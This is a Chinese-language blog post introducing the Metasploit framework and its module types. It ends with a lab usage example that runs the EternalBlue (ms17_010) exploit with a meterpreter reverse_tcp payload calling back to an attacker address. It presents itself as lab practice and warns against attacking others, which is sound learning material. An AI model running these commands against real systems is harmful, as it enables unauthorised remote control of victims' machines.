以下內容皆是筆者在自己的操作機、靶機上進行練習。

Metasploit

Metasploit 是一個開源的滲透測試框架，廣泛用於安全研究和漏洞評估。它提供了一個平台來開發、測試和執行漏洞利用（exploits）和其他攻擊技術。

請勿對別人進行攻擊，屬違法行為。

主要功能和特性

1. 漏洞利用（Exploits）

功能：Metasploit 提供了一個廣泛的漏洞利用模塊庫，這些模塊可以用來利用系統中的已知漏洞。這些漏洞利用模塊可以對目標系統進行攻擊，測試其安全性。
範例：利用已知的軟件漏洞來獲取對系統的未授權訪問。

2. Payloads

Metasploit 的 payload 是攻擊成功後在目標系統上執行的代碼。常見的 payload 包括反向 shell（reverse shell）、本地提權（local privilege escalation）和後門（backdoor）。

• 範例：當漏洞被利用成功後，payload 可以在目標系統上啟動一個遠程 shell 會話，讓攻擊者控制目標系統。

3. Auxiliary 模塊

這些模塊提供了各種額外的功能，如掃描、嗅探和破解。它們不直接利用漏洞，但可以幫助收集信息和進行其他攻擊前的準備工作。

• 範例：掃描開放端口、暴力破解密碼、服務識別。

4. 後期處理（Post-Exploitation）

在攻擊成功後，後期處理模塊用於進一步操作目標系統，例如提權、收集系統信息和維持存取。

• 範例：在目標系統上提權、收集文件、獲取密碼哈希。

5. 社區和專業版本

Metasploit 有一個免費的開源社區版本，以及一個功能更強大、支持更多企業功能的商業版本（Metasploit Pro）。商業版本提供了更多的自動化功能和報告工具。

• 範例：Metasploit Pro 提供的功能包括自動化掃描、網絡拓撲可視化和高級報告功能。

6. 跨平台支持

Metasploit 可以在多種操作系統上運行，包括 Linux、Windows 和 macOS。它支持多種攻擊平台，使得滲透測試能夠在不同環境中進行。

使用範例

1. 啟動 Metasploit 控制台

msfconsole

2. 搜索漏洞利用模塊

search exploit/windows/smb/ms17_010_eternalblue

3. 使用漏洞利用模塊

use exploit/windows/smb/ms17_010_eternalblue

4. 設置漏洞利用參數

set RHOSTS 192.168.1.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.104

5. 執行漏洞利用

exploit

參考來源:

1. HTB_Headless
   自動化攻擊腳本-Metasploit

今天下午就要出國去日本玩了~
希望明天不要忘記發最後一篇